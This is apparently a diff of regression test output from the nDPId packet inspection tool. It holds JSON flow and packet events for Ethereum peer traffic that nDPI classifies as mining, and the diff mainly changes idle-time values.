+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1578508364667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364667,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG40PAqAG4QipS9t0kdl9\/aKJoI\/mFeYAQECy6hgAAAQEICiLYlNgdkmB\/"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1578508364668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364668,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGF+czJjxPwKgBuHZf3TW8w0qY6ojTGKAScSDV+QAAAgQFrAQCCAphOp2qItiUuAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1578508364668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364668,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGCO\/AqAG4MyY8T901dl\/qiNMYvMNKmYAQECxlkQAAAQEICiLYlNlhOp2q"} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364682,"flow_last_seen":1578508364682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364682,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1578508364682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364682,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG833AqAG4MyZRtN04dl9aLQCVAAAAALAC\/\/+JqQAAAgQFtAEDAwUBAQgKItiU5gAAAAAEAgAA"} 01980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1578508364694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAASM2BBAADcR1ngiYawWwKgBuHZfdl8EeMBgH0wTNhnEtwanpj7oWlZ\/Hp0Gak0vyLNY48lrCKzEN97iWOlAwiKU8J2As0GDwpvqMobAk\/doYUwERgBj\/dX1qwI+w93bqV+opA8zeXK5DOY5QqaAWe1EmRlafyw14V0SAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2ENiSg04J2X4J2X7hAPRqHFTz0e8oEsmOadgUbUG0\/Gq1XFXFWshB59yMDlMnzDbSaQte3vRlNp0x8bXK\/C0IExkQW+7e6O42uaIsSOfhNhG\/lALSCTtaCTta4QNKaGvf27ePtI09PYWMWWoqsTgBFWVV\/OStWx2mo9mqS58z7TiK83yibq71BZSi0CSsekwb4Zyr8nj5zQd0mqCb4TYSkhGWfgnZfgnZfuEBoaZQlH\/tAMTmENPyYivdiK6qXFlTxe+\/p6cPLqiael7D6BFBiRXZHacw3oUOaGk4+u32W1NMUjoJXk06B2mEI+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhHLbOhmCTtaCTta4QOsAfRHCWayd+ePpaQzEOGf3dXjZZgxjuurzp9q\/DaDAlIrlX0hFIpZGowqYAlmPGRQlb2Zp7G196tUzRB5lA1D4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2EI9yzYIJ2YIJ2YLhAOJyQU2JE6mr+PrqS1VpbvrNoILvKRQR+abFnLs+XgISTnL1u7Up3BqfrKb9hyDFv4+EivNbWhPn9c0jykBsfLvhNhC9ngvuCdmKCdmK4QMQewuj5qn6FtR+caLmA7fiCCCWlXl5n4eHsa\/hStv5IXJfR3qW2xYlmjRashSfhzXIk\/cArlEuFCVyLKkliTzj4TYR68x8XgglNgk7WuEDyUr+wEhCRTzC+abav+Qq8gCoJQuHHGbcH\/DZQmfl9EGgUirj+pxEJRc8L7rXREu747IWcesHQp9HRE6vORWkC+E2E1W2gk4Kvx4Kvx7hAdMXaCMYMMwBE0nd2ZguY7X9OffS41d7S\/Y+mPW\/bN2r4s5PDjCrWaOVF\/TvDBjFcUWsPiqOXMHIqsOoggNo9SvhNhE4vwp6Cdl+Cdl+4QPkOM4NqDnpAiCaFdcv7mpRSPLANloklV4wbFH\/35BGlAWuLnC96pYG30ySaUekbUEoxDdJFuDpuhxs7uesYXD\/4TYSOLK6TgnZhgnZhuEDoktJdZWuqibhkACX5AYXpi\/92jauNHaPZe57KQENT7f3lptm8vn\/KsHCyQGycNosbcDhgVNlPlUl4B5KRi2QIhF4WIGA="} 00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1578508364694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAAF02BFAADcR2Y8iYawWwKgBuHZfdl8BYBsKk2vVIKFBe5srt6TuKGLoSQyIYHTHTIh8E6CjfYCc9i8bqGNRb1RdySNn+Iv9WrBeYgM40YLK2f29HLFDjWvrLH5PzXOrZjlyFrfNSw\/LgHRZLq7JZkTKJJivek9A0KFTAQT49Pjt+E2EWSTXC4J2YYJ2YbhAKsm6hrEBgceppDA8y6y8ToI4LATCvXtK2lH6G5Ea4z\/xJThSCDAuG5MSvtPStPEkcnXcb7SOx0jpL4DMcyqusPhNhJ+KPreCdl+Cdl+4QFFks1Hi1w5Dzl6eTycY4XMH5jgPi\/IsM\/Xh\/aiCTq6KUBnNNvsH2QEEcq8Eurha1gzN35pyz9iUxxW+rcV0tUj4TYTPtOCBgg09gg09uEBD39Z7PE\/miF\/gBzQtLgOKuJmlQiP1\/EPNHjqCw\/jys2eg7dySq1uz5KP5CQPL3LPisAyyzl2cNiKWtBUo4PgQhF4WIGA="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1578508364697,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364697,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHkfoAAEARTtTAqAG4NiSg03Zfdl8As+iZ15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} 00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364714,"flow_last_seen":1578508364714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364714,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1578508364714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSM3AqAG4UpHc+d05dl+ffKVSAAAAALAC\/\/\/0ywAAAgQFtAEDAwUBAQgKItiVBQAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1578508364717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364717,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMGVBhoKtkZwKgBuHZf3SMhYrdg7BRmI6AS\/ohxlQAAAgQFoAQCCAru0q\/IItiUTwEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1578508364717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364717,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNyDAqAG4aCrZGd0jdl\/sFGYjIWK3YYAQEAmOFAAAAQEICiLYlQju0q\/I"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364714,"flow_last_seen":1578508364714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364714,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1578508364714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSM3AqAG4UpHc+d05dl+ffKVSAAAAALAC\/\/\/0ywAAAgQFtAEDAwUBAQgKItiVBQAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1578508364717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364717,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMGVBhoKtkZwKgBuHZf3SMhYrdg7BRmI6AS\/ohxlQAAAgQFoAQCCAru0q\/IItiUTwEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1578508364717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364717,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNyDAqAG4aCrZGd0jdl\/sFGYjIWK3YYAQEAmOFAAAAQEICiLYlQju0q\/I"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1578508364729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7gO1AADART9iAADOMwKgBuHZfdl8EJxcg9PffAeslidE0A2XYKUWPfQSrSzELT24RQsZMkDFAUC\/8t71UobxaKgVF9YFxtOS9Li4RLrxMDnrT4k5PGgw2NDHZtKrKg8J\/d2YlScEj\/YBR+sG3bhx8yqSCwFLu+QmtAQT5A7r5A7L4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2ETi\/CnoJ2X4J2X7hA+Q4zg2oOekCIJoV1y\/ualFI8sA2WiSVXjBsUf\/fkEaUBa4ucL3qlgbfTJJpR6RtQSjEN0kW4Om6HGzu56xhcP\/hNhF6CJvWCdl+Cdl+4QCa0AdVA2\/h5KxbzG7wSXhKLcgLDQf3VZM6j4pcDpEr22I0w8vjr3eeZrANzqy+B0k7Jw6sj9qOYOkYu9v1\/HcL4S4QXZGXDgsVFgLhA4dMHiHESZvaZv5XwOSEg7GIAhtTuq\/1+kuZamW7NEWy5Mx7jYjqriPSY+yi8MCrIJ809xx8ts8E05ybrI5RK9vhNhHTKaT+Cdl+Cdl+4QNscTNh1YzVnvcLB2a2lU2bz3gyaTlXXbE+pFLDVoDdFI5ADpod42cruH9wQt79YZLxlJa01FygTlV6X9wnzbsb4TYRSpWAfgnZhgnZhuECxFAegsyOgyfrql\/zztxCELDSekbbhUJf21H8iSNiW9cKP2xirrTz8RKLVHxNA2LkFNcMF8l9m+GUUJJ3wo0ve+E2EZ\/0rzIJ2X4J2X7hA0+1Q\/zfDwmqiJ4L7\/yvPXaADca3\/aoKeqi6XasejIDSTPmS2ILmdZ2LgwWGNQRAtsR66VqR5PIUppHE6JTXzu\/hNhC9aDGqCdl+Cdl+4QEWucUJTr5uswusybUrNZinvmACa+spHP3M8Ca80aMiKTDP2An9QqqbsJgkcvDnFqQSdwmVB0j3FFWWOWXchmBH4TYQ03B+BglLcglLcuEC4ECYNzxwi2kJoJQjyJ6lUniuRlC+UndNWqAZRufW0X533Ymm1WtW8x0w\/1eGqPwGeOGNfU57w7mmrZv5S0MuC+E2EoBCKUoJ2X4J2X7hA7pvrsi4uzujUwcCnzbOXM3k+PSTxp6vSaGlZ+vjNNS2DLnFg12pt76j1a3+aMxZ2sjeuJ4ACTqyhbBihj1yObfhNhLB96meCdl+Cdl+4QMGwHxHg22IaagGZCrHWyox4ceWSrkz5+TUJ7FvSKEAsyUrKnBQ1BKg4U4OyDXv653Ump5Su2Klg\/PAjth\/4FVX4TYQDCFzcgnZfgnZfuEAOe5LjgOGocDnrwWucrGwohrnh\/PIVvUNi2EPcxA3lL9o2I1kGKrrcltIHdy07g5GmzReWD9IntTCd9ncDRnHuhF4WIGA="} 01011{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1578508364729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFgO5AADARUk2AADOMwKgBuHZfdl8BsUbFE+HTPyEyomNSay73CyfrLD8rHnhX7vxj92G3He3rB8i3yggvxA3gI120fMxC8T5NSVg69zUML0xXdXDn6x+i1UJlYzm2ZsL8HkXRcVxsD7\/Cz8uc2cDeR5GmI31rs3BBAAT5AUT5ATz4TYRWzyr3gnZfgnZfuEAwPG4npPFCKterF6wXX6hmKDtHpPLV5Gpyh4HRvQlb1WOtMBiFa5iB1p48IlU7yQzlUhHlEKU2TAWk+UxWCOtE+E2EwKkGMYJ2X4J2X7hAXDWjwnntCdEfY7ZsbIcma6dZim0sS\/6AZlg+cBMsOylaupmT4K85DC7A88jAAB9\/AkNP7Q7FRuWOzTw655z20fhNhF\/YD6SCdl+Cdl+4QMhe7o3oH5yNMBpAbg7BFfLQiRhzAx0IcRlGupvV\/Zui89t4l4x5tGAZhBv4cgNKbiHVFqGfCeCtDh7KA5ZNUtn4TYQ2yX4zgnZfgnZfuEBWXo894U5qji3Sd9oPTupJEBwpi5JkOWop7uGO9PMehSCnS4eHg4+tauk7NJIwG19teeCjKxS93DtycMhLIWGEhF4WIGA="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1578508364732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364732,"pkt":"EBMx8Tl2KDc3AG3ICABFAACccxcAAEAR1EDAqAG4b+UAtHZfTtYAiDTvS0gyrIvyYAXql+rzEz+AR\/cLOiJor5McpZ3aQTzvVtbxvdlPVHOvm8x2T63kxRajQJXVXM7hf79y1fQG9XWokxXgcqkKLlUPoIFVVYrTntTkZjbBJdoltYqy5v2xN8\/CAAHdBMuEfwAAAYJ2X4J2X8mEb+UAtIJO1oCEXhYgYAU="} 00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1578508364751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364751,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGCIIzJlG0wKgBuHZf3ThkB68VWi0AlqAScSALcgAAAgQFrAQCCAqBHInXItiU5gEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1578508364751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364751,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG84nAqAG4MyZRtN04dl9aLQCWZAevFoAQECya6gAAAQEICiLYlSaBHInX"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1578508364751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364751,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGCIIzJlG0wKgBuHZf3ThkB68VWi0AlqAScSALcgAAAgQFrAQCCAqBHInXItiU5gEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1578508364751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364751,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG84nAqAG4MyZRtN04dl9aLQCWZAevFoAQECya6gAAAQEICiLYlSaBHInX"} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 